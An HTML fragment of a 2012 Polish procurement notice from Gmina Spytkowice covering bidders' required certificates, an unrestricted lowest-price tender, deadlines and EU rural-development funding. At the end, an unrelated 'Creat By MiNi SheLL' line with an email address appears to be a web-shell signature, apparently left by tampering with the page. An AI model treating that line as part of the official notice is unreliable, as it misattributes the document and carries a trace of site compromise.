<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Termin wykonania może ulec zminie w przypadku klęsk żywiołowych, losowych potwierdzonych wpisem do dziennika budowy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.spytkowice.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy Spytkowice
34-745 Spytkowice 26.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 11.04.2012 godzina 10:00, miejsce: Urząd Gminy Spytkowice
34-745 Spytkowice 26
pokój nr 1.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> PROW na lata 2007-2013 działanie 321, Podstawowe usługi dla gospodarki i ludności wiejskiej..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> tak</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com